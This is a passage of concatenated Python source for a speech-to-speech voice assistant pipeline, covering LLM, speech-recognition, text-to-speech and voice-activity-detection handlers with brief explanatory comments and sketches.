+ self.chat = Chat(chat_size)
48
+ if init_chat_role:
49
+ if not init_chat_prompt:
50
+ raise ValueError('An initial prompt needs to be specified when setting init_chat_role.')
51
+ self.chat.init_chat({'role': init_chat_role, 'content': init_chat_prompt})
52
+ self.user_role = user_role
53
+ self.warmup()
54
+
55
+ def warmup(self):
56
+ logger.info(f'Warming up {self.__class__.__name__}')
57
+ dummy_input_text = "Repeat the word 'home'."
58
+ dummy_chat = [{'role': self.user_role, 'content': dummy_input_text}]
59
+ warmup_gen_kwargs = {'min_new_tokens': self.gen_kwargs['min_new_tokens'], 'max_new_tokens': self.gen_kwargs['max_new_tokens'], **self.gen_kwargs}
60
+ n_steps = 2
61
+ if self.device == 'cuda':
62
+ start_event = torch.cuda.Event(enable_timing=True)
63
+ end_event = torch.cuda.Event(enable_timing=True)
64
+ torch.cuda.synchronize()
65
+ start_event.record()
66
+ for _ in range(n_steps):
67
+ thread = Thread(target=self.pipe, args=(dummy_chat,), kwargs=warmup_gen_kwargs)
68
+ thread.start()
69
+ for _ in self.streamer:
70
+ pass
71
+ if self.device == 'cuda':
72
+ end_event.record()
73
+ torch.cuda.synchronize()
74
+ logger.info(f'{self.__class__.__name__}: warmed up! time: {start_event.elapsed_time(end_event) * 0.001:.3f} s')
75
+
76
+ def process(self, prompt):
77
+ logger.debug('inferring language model...')
78
+ language_code = None
79
+ if isinstance(prompt, tuple):
80
+ (prompt, language_code) = prompt
81
+ prompt = f'Please reply to my message in {WHISPER_LANGUAGE_TO_LLM_LANGUAGE[language_code]}. ' + prompt
82
+ self.chat.append({'role': self.user_role, 'content': prompt})
83
+ thread = Thread(target=self.pipe, args=(self.chat.to_list(),), kwargs=self.gen_kwargs)
84
+ thread.start()
85
+ if self.device == 'mps':
86
+ generated_text = ''
87
+ for new_text in self.streamer:
88
+ generated_text += new_text
89
+ printable_text = generated_text
90
+ torch.mps.empty_cache()
91
+ else:
92
+ (generated_text, printable_text) = ('', '')
93
+ for new_text in self.streamer:
94
+ generated_text += new_text
95
+ printable_text += new_text
96
+ sentences = sent_tokenize(printable_text)
97
+ if len(sentences) > 1:
98
+ yield (sentences[0], language_code)
99
+ printable_text = new_text
100
+ self.chat.append({'role': 'assistant', 'content': generated_text})
101
+ yield (printable_text, language_code)
102
+
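The streaming branch above yields a sentence as soon as sent_tokenize sees more than one complete sentence in the accumulated text. A stripped-down sketch of that chunking idea, independent of the model and with slightly simplified remainder handling (assumes the nltk punkt data is installed):

    from nltk import sent_tokenize

    def stream_sentences(token_stream):
        # Accumulate streamed text chunks and emit full sentences as they complete.
        pending = ""
        for token in token_stream:
            pending += token
            sentences = sent_tokenize(pending)
            if len(sentences) > 1:
                yield sentences[0]
                pending = pending[len(sentences[0]):].lstrip()
        if pending:
            yield pending

    list(stream_sentences(["Hello ", "world. ", "How ", "are ", "you?"]))  # ['Hello world.', 'How are you?']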
103
+ # File: speech-to-speech-main/LLM/mlx_language_model.py
104
+ import logging
105
+ from LLM.chat import Chat
106
+ from baseHandler import BaseHandler
107
+ from mlx_lm import load, stream_generate, generate
108
+ from rich.console import Console
109
+ import torch
110
+ logger = logging.getLogger(__name__)
111
+ console = Console()
112
+ WHISPER_LANGUAGE_TO_LLM_LANGUAGE = {'en': 'english', 'fr': 'french', 'es': 'spanish', 'zh': 'chinese', 'ja': 'japanese', 'ko': 'korean'}
113
+
114
+ class MLXLanguageModelHandler(BaseHandler):
115
+
116
+ def setup(self, model_name='microsoft/Phi-3-mini-4k-instruct', device='mps', torch_dtype='float16', gen_kwargs={}, user_role='user', chat_size=1, init_chat_role=None, init_chat_prompt='You are a helpful AI assistant.'):
117
+ self.model_name = model_name
118
+ (self.model, self.tokenizer) = load(self.model_name)
119
+ self.gen_kwargs = gen_kwargs
120
+ self.chat = Chat(chat_size)
121
+ if init_chat_role:
122
+ if not init_chat_prompt:
123
+ raise ValueError('An initial prompt needs to be specified when setting init_chat_role.')
124
+ self.chat.init_chat({'role': init_chat_role, 'content': init_chat_prompt})
125
+ self.user_role = user_role
126
+ self.warmup()
127
+
128
+ def warmup(self):
129
+ logger.info(f'Warming up {self.__class__.__name__}')
130
+ dummy_input_text = 'Write me a poem about Machine Learning.'
131
+ dummy_chat = [{'role': self.user_role, 'content': dummy_input_text}]
132
+ n_steps = 2
133
+ for _ in range(n_steps):
134
+ prompt = self.tokenizer.apply_chat_template(dummy_chat, tokenize=False)
135
+ generate(self.model, self.tokenizer, prompt=prompt, max_tokens=self.gen_kwargs['max_new_tokens'], verbose=False)
136
+
137
+ def process(self, prompt):
138
+ logger.debug('inferring language model...')
139
+ language_code = None
140
+ if isinstance(prompt, tuple):
141
+ (prompt, language_code) = prompt
142
+ prompt = f'Please reply to my message in {WHISPER_LANGUAGE_TO_LLM_LANGUAGE[language_code]}. ' + prompt
143
+ self.chat.append({'role': self.user_role, 'content': prompt})
144
+ if 'gemma' in self.model_name.lower():
145
+ chat_messages = [msg for msg in self.chat.to_list() if msg['role'] != 'system']
146
+ else:
147
+ chat_messages = self.chat.to_list()
148
+ prompt = self.tokenizer.apply_chat_template(chat_messages, tokenize=False, add_generation_prompt=True)
149
+ output = ''
150
+ curr_output = ''
151
+ for t in stream_generate(self.model, self.tokenizer, prompt, max_tokens=self.gen_kwargs['max_new_tokens']):
152
+ output += t
153
+ curr_output += t
154
+ if curr_output.endswith(('.', '?', '!', '<|end|>')):
155
+ yield (curr_output.replace('<|end|>', ''), language_code)
156
+ curr_output = ''
157
+ generated_text = output.replace('<|end|>', '')
158
+ torch.mps.empty_cache()
159
+ self.chat.append({'role': 'assistant', 'content': generated_text})
160
+
161
+ # File: speech-to-speech-main/STT/lightning_whisper_mlx_handler.py
162
+ import logging
163
+ from time import perf_counter
164
+ from baseHandler import BaseHandler
165
+ from lightning_whisper_mlx import LightningWhisperMLX
166
+ import numpy as np
167
+ from rich.console import Console
168
+ from copy import copy
169
+ import torch
170
+ logger = logging.getLogger(__name__)
171
+ console = Console()
172
+ SUPPORTED_LANGUAGES = ['en', 'fr', 'es', 'zh', 'ja', 'ko']
173
+
174
+ class LightningWhisperSTTHandler(BaseHandler):
175
+
176
+ def setup(self, model_name='distil-large-v3', device='mps', torch_dtype='float16', compile_mode=None, language=None, gen_kwargs={}):
177
+ if len(model_name.split('/')) > 1:
178
+ model_name = model_name.split('/')[-1]
179
+ self.device = device
180
+ self.model = LightningWhisperMLX(model=model_name, batch_size=6, quant=None)
181
+ self.start_language = language
182
+ self.last_language = language
183
+ self.warmup()
184
+
185
+ def warmup(self):
186
+ logger.info(f'Warming up {self.__class__.__name__}')
187
+ n_steps = 1
188
+ dummy_input = np.array([0] * 512)
189
+ for _ in range(n_steps):
190
+ _ = self.model.transcribe(dummy_input)['text'].strip()
191
+
192
+ def process(self, spoken_prompt):
193
+ logger.debug('inferring whisper...')
194
+ global pipeline_start
195
+ pipeline_start = perf_counter()
196
+ if self.start_language != 'auto':
197
+ transcription_dict = self.model.transcribe(spoken_prompt, language=self.start_language)
198
+ else:
199
+ transcription_dict = self.model.transcribe(spoken_prompt)
200
+ language_code = transcription_dict['language']
201
+ if language_code not in SUPPORTED_LANGUAGES:
202
+ logger.warning(f'Whisper detected unsupported language: {language_code}')
203
+ if self.last_language in SUPPORTED_LANGUAGES:
204
+ transcription_dict = self.model.transcribe(spoken_prompt, language=self.last_language)
205
+ else:
206
+ transcription_dict = {'text': '', 'language': 'en'}
207
+ else:
208
+ self.last_language = language_code
209
+ pred_text = transcription_dict['text'].strip()
210
+ language_code = transcription_dict['language']
211
+ torch.mps.empty_cache()
212
+ logger.debug('finished whisper inference')
213
+ console.print(f'[yellow]USER: {pred_text}')
214
+ logger.debug(f'Language Code Whisper: {language_code}')
215
+ yield (pred_text, language_code)
216
+
217
+ # File: speech-to-speech-main/STT/paraformer_handler.py
218
+ import logging
219
+ from time import perf_counter
220
+ from baseHandler import BaseHandler
221
+ from funasr import AutoModel
222
+ import numpy as np
223
+ from rich.console import Console
224
+ import torch
225
+ logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
226
+ logger = logging.getLogger(__name__)
227
+ console = Console()
228
+
229
+ class ParaformerSTTHandler(BaseHandler):
230
+
231
+ def setup(self, model_name='paraformer-zh', device='cuda', gen_kwargs={}):
232
+ print(model_name)
233
+ if len(model_name.split('/')) > 1:
234
+ model_name = model_name.split('/')[-1]
235
+ self.device = device
236
+ self.model = AutoModel(model=model_name, device=device)
237
+ self.warmup()
238
+
239
+ def warmup(self):
240
+ logger.info(f'Warming up {self.__class__.__name__}')
241
+ n_steps = 1
242
+ dummy_input = np.array([0] * 512, dtype=np.float32)
243
+ for _ in range(n_steps):
244
+ _ = self.model.generate(dummy_input)[0]['text'].strip().replace(' ', '')
245
+
246
+ def process(self, spoken_prompt):
247
+ logger.debug('inferring paraformer...')
248
+ global pipeline_start
249
+ pipeline_start = perf_counter()
250
+ pred_text = self.model.generate(spoken_prompt)[0]['text'].strip().replace(' ', '')
251
+ torch.mps.empty_cache()
252
+ logger.debug('finished paraformer inference')
253
+ console.print(f'[yellow]USER: {pred_text}')
254
+ yield pred_text
255
+
256
+ # File: speech-to-speech-main/STT/whisper_stt_handler.py
257
+ from time import perf_counter
258
+ from transformers import AutoProcessor, AutoModelForSpeechSeq2Seq
259
+ import torch
260
+ from copy import copy
261
+ from baseHandler import BaseHandler
262
+ from rich.console import Console
263
+ import logging
264
+ logger = logging.getLogger(__name__)
265
+ console = Console()
266
+ SUPPORTED_LANGUAGES = ['en', 'fr', 'es', 'zh', 'ja', 'ko']
267
+
268
+ class WhisperSTTHandler(BaseHandler):
269
+
270
+ def setup(self, model_name='distil-whisper/distil-large-v3', device='cuda', torch_dtype='float16', compile_mode=None, language=None, gen_kwargs={}):
271
+ self.device = device
272
+ self.torch_dtype = getattr(torch, torch_dtype)
273
+ self.compile_mode = compile_mode
274
+ self.gen_kwargs = gen_kwargs
275
+ if language == 'auto':
276
+ language = None
277
+ self.last_language = language
278
+ if self.last_language is not None:
279
+ self.gen_kwargs['language'] = self.last_language
280
+ self.processor = AutoProcessor.from_pretrained(model_name)
281
+ self.model = AutoModelForSpeechSeq2Seq.from_pretrained(model_name, torch_dtype=self.torch_dtype).to(device)
282
+ if self.compile_mode:
283
+ self.model.generation_config.cache_implementation = 'static'
284
+ self.model.forward = torch.compile(self.model.forward, mode=self.compile_mode, fullgraph=True)
285
+ self.warmup()
286
+
287
+ def prepare_model_inputs(self, spoken_prompt):
288
+ input_features = self.processor(spoken_prompt, sampling_rate=16000, return_tensors='pt').input_features
289
+ input_features = input_features.to(self.device, dtype=self.torch_dtype)
290
+ return input_features
291
+
292
+ def warmup(self):
293
+ logger.info(f'Warming up {self.__class__.__name__}')
294
+ n_steps = 1 if self.compile_mode == 'default' else 2
295
+ dummy_input = torch.randn((1, self.model.config.num_mel_bins, 3000), dtype=self.torch_dtype, device=self.device)
296
+ if self.compile_mode not in (None, 'default'):
297
+ warmup_gen_kwargs = {'min_new_tokens': self.gen_kwargs['max_new_tokens'], 'max_new_tokens': self.gen_kwargs['max_new_tokens'], **self.gen_kwargs}
298
+ else:
299
+ warmup_gen_kwargs = self.gen_kwargs
300
+ if self.device == 'cuda':
301
+ start_event = torch.cuda.Event(enable_timing=True)
302
+ end_event = torch.cuda.Event(enable_timing=True)
303
+ torch.cuda.synchronize()
304
+ start_event.record()
305
+ for _ in range(n_steps):
306
+ _ = self.model.generate(dummy_input, **warmup_gen_kwargs)
307
+ if self.device == 'cuda':
308
+ end_event.record()
309
+ torch.cuda.synchronize()
310
+ logger.info(f'{self.__class__.__name__}: warmed up! time: {start_event.elapsed_time(end_event) * 0.001:.3f} s')
311
+
312
+ def process(self, spoken_prompt):
313
+ logger.debug('inferring whisper...')
314
+ global pipeline_start
315
+ pipeline_start = perf_counter()
316
+ input_features = self.prepare_model_inputs(spoken_prompt)
317
+ pred_ids = self.model.generate(input_features, **self.gen_kwargs)
318
+ language_code = self.processor.tokenizer.decode(pred_ids[0, 1])[2:-2]
319
+ if language_code not in SUPPORTED_LANGUAGES:
320
+ logger.warning(f'Whisper detected unsupported language: {language_code}')
321
+ gen_kwargs = copy(self.gen_kwargs)
322
+ gen_kwargs['language'] = self.last_language
323
+ language_code = self.last_language
324
+ pred_ids = self.model.generate(input_features, **gen_kwargs)
325
+ else:
326
+ self.last_language = language_code
327
+ pred_text = self.processor.batch_decode(pred_ids, skip_special_tokens=True, decode_with_timestamps=False)[0]
328
+ language_code = self.processor.tokenizer.decode(pred_ids[0, 1])[2:-2]
329
+ logger.debug('finished whisper inference')
330
+ console.print(f'[yellow]USER: {pred_text}')
331
+ logger.debug(f'Language Code Whisper: {language_code}')
332
+ yield (pred_text, language_code)
333
+
334
+ # File: speech-to-speech-main/TTS/chatTTS_handler.py
335
+ import ChatTTS
336
+ import logging
337
+ from baseHandler import BaseHandler
338
+ import librosa
339
+ import numpy as np
340
+ from rich.console import Console
341
+ import torch
342
+ logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
343
+ logger = logging.getLogger(__name__)
344
+ console = Console()
345
+
346
+ class ChatTTSHandler(BaseHandler):
347
+
348
+ def setup(self, should_listen, device='cuda', gen_kwargs={}, stream=True, chunk_size=512):
349
+ self.should_listen = should_listen
350
+ self.device = device
351
+ self.model = ChatTTS.Chat()
352
+ self.model.load(compile=False)
353
+ self.chunk_size = chunk_size
354
+ self.stream = stream
355
+ rnd_spk_emb = self.model.sample_random_speaker()
356
+ self.params_infer_code = ChatTTS.Chat.InferCodeParams(spk_emb=rnd_spk_emb)
357
+ self.warmup()
358
+
359
+ def warmup(self):
360
+ logger.info(f'Warming up {self.__class__.__name__}')
361
+ _ = self.model.infer('text')
362
+
363
+ def process(self, llm_sentence):
364
+ console.print(f'[green]ASSISTANT: {llm_sentence}')
365
+ if self.device == 'mps':
366
+ import time
367
+ start = time.time()
368
+ torch.mps.synchronize()
369
+ torch.mps.empty_cache()
370
+ _ = time.time() - start
371
+ wavs_gen = self.model.infer(llm_sentence, params_infer_code=self.params_infer_code, stream=self.stream)
372
+ if self.stream:
373
+ wavs = [np.array([])]
374
+ for gen in wavs_gen:
375
+ if gen[0] is None or len(gen[0]) == 0:
376
+ self.should_listen.set()
377
+ return
378
+ audio_chunk = librosa.resample(gen[0], orig_sr=24000, target_sr=16000)
379
+ audio_chunk = (audio_chunk * 32768).astype(np.int16)[0]
380
+ while len(audio_chunk) > self.chunk_size:
381
+ yield audio_chunk[:self.chunk_size]
382
+ audio_chunk = audio_chunk[self.chunk_size:]
383
+ yield np.pad(audio_chunk, (0, self.chunk_size - len(audio_chunk)))
384
+ else:
385
+ wavs = wavs_gen
386
+ if len(wavs[0]) == 0:
387
+ self.should_listen.set()
388
+ return
389
+ audio_chunk = librosa.resample(wavs[0], orig_sr=24000, target_sr=16000)
390
+ audio_chunk = (audio_chunk * 32768).astype(np.int16)
391
+ for i in range(0, len(audio_chunk), self.chunk_size):
392
+ yield np.pad(audio_chunk[i:i + self.chunk_size], (0, self.chunk_size - len(audio_chunk[i:i + self.chunk_size])))
393
+ self.should_listen.set()
394
+
395
+ # File: speech-to-speech-main/TTS/melo_handler.py
396
+ from melo.api import TTS
397
+ import logging
398
+ from baseHandler import BaseHandler
399
+ import librosa
400
+ import numpy as np
401
+ from rich.console import Console
402
+ import torch
403
+ logger = logging.getLogger(__name__)
404
+ console = Console()
405
+ WHISPER_LANGUAGE_TO_MELO_LANGUAGE = {'en': 'EN_NEWEST', 'fr': 'FR', 'es': 'ES', 'zh': 'ZH', 'ja': 'JP', 'ko': 'KR'}
406
+ WHISPER_LANGUAGE_TO_MELO_SPEAKER = {'en': 'EN-Newest', 'fr': 'FR', 'es': 'ES', 'zh': 'ZH', 'ja': 'JP', 'ko': 'KR'}
407
+
408
+ class MeloTTSHandler(BaseHandler):
409
+
410
+ def setup(self, should_listen, device='mps', language='en', speaker_to_id='en', gen_kwargs={}, blocksize=512):
411
+ self.should_listen = should_listen
412
+ self.device = device
413
+ self.language = language
414
+ self.model = TTS(language=WHISPER_LANGUAGE_TO_MELO_LANGUAGE[self.language], device=device)
415
+ self.speaker_id = self.model.hps.data.spk2id[WHISPER_LANGUAGE_TO_MELO_SPEAKER[speaker_to_id]]
416
+ self.blocksize = blocksize
417
+ self.warmup()
418
+
419
+ def warmup(self):
420
+ logger.info(f'Warming up {self.__class__.__name__}')
421
+ _ = self.model.tts_to_file('text', self.speaker_id, quiet=True)
422
+
423
+ def process(self, llm_sentence):
424
+ language_code = None
425
+ if isinstance(llm_sentence, tuple):
426
+ (llm_sentence, language_code) = llm_sentence
427
+ console.print(f'[green]ASSISTANT: {llm_sentence}')
428
+ if language_code is not None and self.language != language_code:
429
+ try:
430
+ self.model = TTS(language=WHISPER_LANGUAGE_TO_MELO_LANGUAGE[language_code], device=self.device)
431
+ self.speaker_id = self.model.hps.data.spk2id[WHISPER_LANGUAGE_TO_MELO_SPEAKER[language_code]]
432
+ self.language = language_code
433
+ except KeyError:
434
+ console.print(f'[red]Language {language_code} not supported by Melo. Using {self.language} instead.')
435
+ if self.device == 'mps':
436
+ import time
437
+ start = time.time()
438
+ torch.mps.synchronize()
439
+ torch.mps.empty_cache()
440
+ _ = time.time() - start
441
+ try:
442
+ audio_chunk = self.model.tts_to_file(llm_sentence, self.speaker_id, quiet=True)
443
+ except (AssertionError, RuntimeError) as e:
444
+ logger.error(f'Error in MeloTTSHandler: {e}')
445
+ audio_chunk = np.array([])
446
+ if len(audio_chunk) == 0:
447
+ self.should_listen.set()
448
+ return
449
+ audio_chunk = librosa.resample(audio_chunk, orig_sr=44100, target_sr=16000)
450
+ audio_chunk = (audio_chunk * 32768).astype(np.int16)
451
+ for i in range(0, len(audio_chunk), self.blocksize):
452
+ yield np.pad(audio_chunk[i:i + self.blocksize], (0, self.blocksize - len(audio_chunk[i:i + self.blocksize])))
453
+ self.should_listen.set()
454
+
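The Melo and ChatTTS handlers above share the same output framing: resample the synthesized audio to 16 kHz, scale it to 16-bit PCM, and yield fixed-size blocks, zero-padding the last one so downstream consumers always receive equal-length chunks. A minimal, self-contained sketch of that framing step (illustrative only; the signal and block size below are made up):

import numpy as np

def frame_audio(audio: np.ndarray, blocksize: int = 512):
    # Scale float audio in [-1, 1] to 16-bit PCM, as the handlers do.
    pcm = (audio * 32768).astype(np.int16)
    # Yield equal-sized blocks, zero-padding the final partial block.
    for i in range(0, len(pcm), blocksize):
        block = pcm[i:i + blocksize]
        yield np.pad(block, (0, blocksize - len(block)))

# Example: one second of a 1 kHz tone at 16 kHz, framed into 512-sample blocks.
tone = 0.5 * np.sin(2 * np.pi * 1000 * np.arange(16000) / 16000)
blocks = list(frame_audio(tone))
assert all(len(b) == 512 for b in blocks)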
455
+ # File: speech-to-speech-main/TTS/parler_handler.py
456
+ from threading import Thread
457
+ from time import perf_counter
458
+ from baseHandler import BaseHandler
459
+ import numpy as np
460
+ import torch
461
+ from transformers import AutoTokenizer
462
+ from parler_tts import ParlerTTSForConditionalGeneration, ParlerTTSStreamer
463
+ import librosa
464
+ import logging
465
+ from rich.console import Console
466
+ from utils.utils import next_power_of_2
467
+ from transformers.utils.import_utils import is_flash_attn_2_available
468
+ torch._inductor.config.fx_graph_cache = True
469
+ torch._dynamo.config.cache_size_limit = 15
470
+ logger = logging.getLogger(__name__)
471
+ console = Console()
472
+ if not is_flash_attn_2_available() and torch.cuda.is_available():
473
+ logger.warn('Parler TTS works best with flash attention 2, but it is not installed.\n Given that CUDA is available on this system, you can install flash attention 2 with `uv pip install flash-attn --no-build-isolation`')
474
+
475
+ class ParlerTTSHandler(BaseHandler):
476
+
477
+ def setup(self, should_listen, model_name='ylacombe/parler-tts-mini-jenny-30H', device='cuda', torch_dtype='float16', compile_mode=None, gen_kwargs={}, max_prompt_pad_length=8, description='A female speaker with a slightly low-pitched voice delivers her words quite expressively, in a very confined sounding environment with clear audio quality. She speaks very fast.', play_steps_s=1, blocksize=512):
478
+ self.should_listen = should_listen
479
+ self.device = device
480
+ self.torch_dtype = getattr(torch, torch_dtype)
481
+ self.gen_kwargs = gen_kwargs
482
+ self.compile_mode = compile_mode
483
+ self.max_prompt_pad_length = max_prompt_pad_length
484
+ self.description = description
485
+ self.description_tokenizer = AutoTokenizer.from_pretrained(model_name)
486
+ self.prompt_tokenizer = AutoTokenizer.from_pretrained(model_name)
487
+ self.model = ParlerTTSForConditionalGeneration.from_pretrained(model_name, torch_dtype=self.torch_dtype).to(device)
488
+ framerate = self.model.audio_encoder.config.frame_rate
489
+ self.play_steps = int(framerate * play_steps_s)
490
+ self.blocksize = blocksize
491
+ if self.compile_mode not in (None, 'default'):
492
+ logger.warning("Torch compilation modes that captures CUDA graphs are not yet compatible with the STT part. Reverting to 'default'")
493
+ self.compile_mode = 'default'
494
+ if self.compile_mode:
495
+ self.model.generation_config.cache_implementation = 'static'
496
+ self.model.forward = torch.compile(self.model.forward, mode=self.compile_mode, fullgraph=True)
497
+ self.warmup()
498
+
499
+ def prepare_model_inputs(self, prompt, max_length_prompt=50, pad=False):
500
+ pad_args_prompt = {'padding': 'max_length', 'max_length': max_length_prompt} if pad else {}
501
+ tokenized_description = self.description_tokenizer(self.description, return_tensors='pt')
502
+ input_ids = tokenized_description.input_ids.to(self.device)
503
+ attention_mask = tokenized_description.attention_mask.to(self.device)
504
+ tokenized_prompt = self.prompt_tokenizer(prompt, return_tensors='pt', **pad_args_prompt)
505
+ prompt_input_ids = tokenized_prompt.input_ids.to(self.device)
506
+ prompt_attention_mask = tokenized_prompt.attention_mask.to(self.device)
507
+ gen_kwargs = {'input_ids': input_ids, 'attention_mask': attention_mask, 'prompt_input_ids': prompt_input_ids, 'prompt_attention_mask': prompt_attention_mask, **self.gen_kwargs}
508
+ return gen_kwargs
509
+
510
+ def warmup(self):
511
+ logger.info(f'Warming up {self.__class__.__name__}')
512
+ if self.device == 'cuda':
513
+ start_event = torch.cuda.Event(enable_timing=True)
514
+ end_event = torch.cuda.Event(enable_timing=True)
515
+ n_steps = 1 if self.compile_mode == 'default' else 2
516
+ if self.device == 'cuda':
517
+ torch.cuda.synchronize()
518
+ start_event.record()
519
+ if self.compile_mode:
520
+ pad_lengths = [2 ** i for i in range(2, self.max_prompt_pad_length)]
521
+ for pad_length in pad_lengths[::-1]:
522
+ model_kwargs = self.prepare_model_inputs('dummy prompt', max_length_prompt=pad_length, pad=True)
523
+ for _ in range(n_steps):
524
+ _ = self.model.generate(**model_kwargs)
525
+ logger.info(f'Warmed up length {pad_length} tokens!')
526
+ else:
527
+ model_kwargs = self.prepare_model_inputs('dummy prompt')
528
+ for _ in range(n_steps):
529
+ _ = self.model.generate(**model_kwargs)
530
+ if self.device == 'cuda':
531
+ end_event.record()
532
+ torch.cuda.synchronize()
533
+ logger.info(f'{self.__class__.__name__}: warmed up! time: {start_event.elapsed_time(end_event) * 0.001:.3f} s')
534
+
535
+ def process(self, llm_sentence):
536
+ if isinstance(llm_sentence, tuple):
537
+ (llm_sentence, _) = llm_sentence
538
+ console.print(f'[green]ASSISTANT: {llm_sentence}')
539
+ nb_tokens = len(self.prompt_tokenizer(llm_sentence).input_ids)
540
+ pad_args = {}
541
+ if self.compile_mode:
542
+ pad_length = next_power_of_2(nb_tokens)
543
+ logger.debug(f'padding to {pad_length}')
544
+ pad_args['pad'] = True
545
+ pad_args['max_length_prompt'] = pad_length
546
+ tts_gen_kwargs = self.prepare_model_inputs(llm_sentence, **pad_args)
547
+ streamer = ParlerTTSStreamer(self.model, device=self.device, play_steps=self.play_steps)
548
+ tts_gen_kwargs = {'streamer': streamer, **tts_gen_kwargs}
549
+ torch.manual_seed(0)
550
+ thread = Thread(target=self.model.generate, kwargs=tts_gen_kwargs)
551
+ thread.start()
552
+ for (i, audio_chunk) in enumerate(streamer):
553
+ global pipeline_start
554
+ if i == 0 and 'pipeline_start' in globals():
555
+ logger.info(f'Time to first audio: {perf_counter() - pipeline_start:.3f}')
556
+ audio_chunk = librosa.resample(audio_chunk, orig_sr=44100, target_sr=16000)
557
+ audio_chunk = (audio_chunk * 32768).astype(np.int16)
558
+ for i in range(0, len(audio_chunk), self.blocksize):
559
+ yield np.pad(audio_chunk[i:i + self.blocksize], (0, self.blocksize - len(audio_chunk[i:i + self.blocksize])))
560
+ self.should_listen.set()
561
+
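ParlerTTSHandler pads compiled prompts to the next power of two so that torch.compile with a static cache only ever sees the shapes warmed up above (pad_lengths = [2 ** i ...]). The helper next_power_of_2 lives in utils/utils.py and is not shown in this section; a plausible equivalent, for illustration only:

def next_power_of_2(n: int) -> int:
    # Smallest power of two >= n (illustrative stand-in for utils.utils.next_power_of_2).
    return 1 if n == 0 else 2 ** (n - 1).bit_length()

assert [next_power_of_2(n) for n in (1, 3, 8, 9)] == [1, 4, 8, 16]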
562
+ # File: speech-to-speech-main/VAD/vad_handler.py
563
+ import torchaudio
564
+ from VAD.vad_iterator import VADIterator
565
+ from baseHandler import BaseHandler
566
+ import numpy as np
567
+ import torch
568
+ from rich.console import Console
569
+ from utils.utils import int2float
570
+ from df.enhance import enhance, init_df
571
+ import logging
572
+ logger = logging.getLogger(__name__)
573
+ console = Console()
574
+
575
+ class VADHandler(BaseHandler):
576
+
577
+ def setup(self, should_listen, thresh=0.3, sample_rate=16000, min_silence_ms=1000, min_speech_ms=500, max_speech_ms=float('inf'), speech_pad_ms=30, audio_enhancement=False):
578
+ self.should_listen = should_listen
579
+ self.sample_rate = sample_rate
580
+ self.min_silence_ms = min_silence_ms
581
+ self.min_speech_ms = min_speech_ms
582
+ self.max_speech_ms = max_speech_ms
583
+ (self.model, _) = torch.hub.load('snakers4/silero-vad', 'silero_vad')
584
+ self.iterator = VADIterator(self.model, threshold=thresh, sampling_rate=sample_rate, min_silence_duration_ms=min_silence_ms, speech_pad_ms=speech_pad_ms)
585
+ self.audio_enhancement = audio_enhancement
586
+ if audio_enhancement:
587
+ (self.enhanced_model, self.df_state, _) = init_df()
588
+
589
+ def process(self, audio_chunk):
590
+ audio_int16 = np.frombuffer(audio_chunk, dtype=np.int16)
591
+ audio_float32 = int2float(audio_int16)
592
+ vad_output = self.iterator(torch.from_numpy(audio_float32))
593
+ if vad_output is not None and len(vad_output) != 0:
594
+ logger.debug('VAD: end of speech detected')
595
+ array = torch.cat(vad_output).cpu().numpy()
596
+ duration_ms = len(array) / self.sample_rate * 1000
597
+ if duration_ms < self.min_speech_ms or duration_ms > self.max_speech_ms:
598
+ logger.debug(f'audio input of duration: {len(array) / self.sample_rate}s, skipping')
599
+ else:
600
+ self.should_listen.clear()
601
+ logger.debug('Stop listening')
602
+ if self.audio_enhancement:
603
+ if self.sample_rate != self.df_state.sr():
604
+ audio_float32 = torchaudio.functional.resample(torch.from_numpy(array), orig_freq=self.sample_rate, new_freq=self.df_state.sr())
605
+ enhanced = enhance(self.enhanced_model, self.df_state, audio_float32.unsqueeze(0))
606
+ enhanced = torchaudio.functional.resample(enhanced, orig_freq=self.df_state.sr(), new_freq=self.sample_rate)
607
+ else:
608
+ enhanced = enhance(self.enhanced_model, self.df_state, audio_float32)
609
+ array = enhanced.numpy().squeeze()
610
+ yield array
611
+
612
+ @property
613
+ def min_time_to_debug(self):
614
+ return 1e-05
615
+
616
+ # File: speech-to-speech-main/VAD/vad_iterator.py
617
+ import torch
618
+
619
+ class VADIterator:
620
+
621
+ def __init__(self, model, threshold: float=0.5, sampling_rate: int=16000, min_silence_duration_ms: int=100, speech_pad_ms: int=30):
622
+ self.model = model
623
+ self.threshold = threshold
624
+ self.sampling_rate = sampling_rate
625
+ self.is_speaking = False
626
+ self.buffer = []
627
+ if sampling_rate not in [8000, 16000]:
628
+ raise ValueError('VADIterator does not support sampling rates other than [8000, 16000]')
629
+ self.min_silence_samples = sampling_rate * min_silence_duration_ms / 1000
630
+ self.speech_pad_samples = sampling_rate * speech_pad_ms / 1000
631
+ self.reset_states()
632
+
633
+ def reset_states(self):
634
+ self.model.reset_states()
635
+ self.triggered = False
636
+ self.temp_end = 0
637
+ self.current_sample = 0
638
+
639
+ @torch.no_grad()
640
+ def __call__(self, x):
641
+ if not torch.is_tensor(x):
642
+ try:
643
+ x = torch.Tensor(x)
644
+ except Exception:
645
+ raise TypeError('Audio cannot be cast to a tensor. Cast it manually')
646
+ window_size_samples = len(x[0]) if x.dim() == 2 else len(x)
647
+ self.current_sample += window_size_samples
648
+ speech_prob = self.model(x, self.sampling_rate).item()
649
+ if speech_prob >= self.threshold and self.temp_end:
650
+ self.temp_end = 0
651
+ if speech_prob >= self.threshold and (not self.triggered):
652
+ self.triggered = True
653
+ return None
654
+ if speech_prob < self.threshold - 0.15 and self.triggered:
655
+ if not self.temp_end:
656
+ self.temp_end = self.current_sample
657
+ if self.current_sample - self.temp_end < self.min_silence_samples:
658
+ return None
659
+ else:
660
+ self.temp_end = 0
661
+ self.triggered = False
662
+ spoken_utterance = self.buffer
663
+ self.buffer = []
664
+ return spoken_utterance
665
+ if self.triggered:
666
+ self.buffer.append(x)
667
+ return None
668
+
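The iterator above is driven window by window: it returns None while speech is ongoing and hands back the buffered windows once silence has lasted longer than min_silence_duration_ms. A small usage sketch with a stub in place of the silero-vad model (run from the repository root; the stub and its probabilities are invented for illustration):

import torch
from VAD.vad_iterator import VADIterator

class _StubVAD:
    # Stand-in for silero-vad: reports "speech" for the first 20 windows, then silence.
    def __init__(self):
        self.calls = 0
    def reset_states(self):
        self.calls = 0
    def __call__(self, x, sr):
        self.calls += 1
        return torch.tensor(0.9 if self.calls <= 20 else 0.0)

vad = VADIterator(_StubVAD(), threshold=0.5, sampling_rate=16000, min_silence_duration_ms=100)
utterance = None
for _ in range(40):
    window = torch.zeros(512)          # 32 ms windows at 16 kHz
    out = vad(window)
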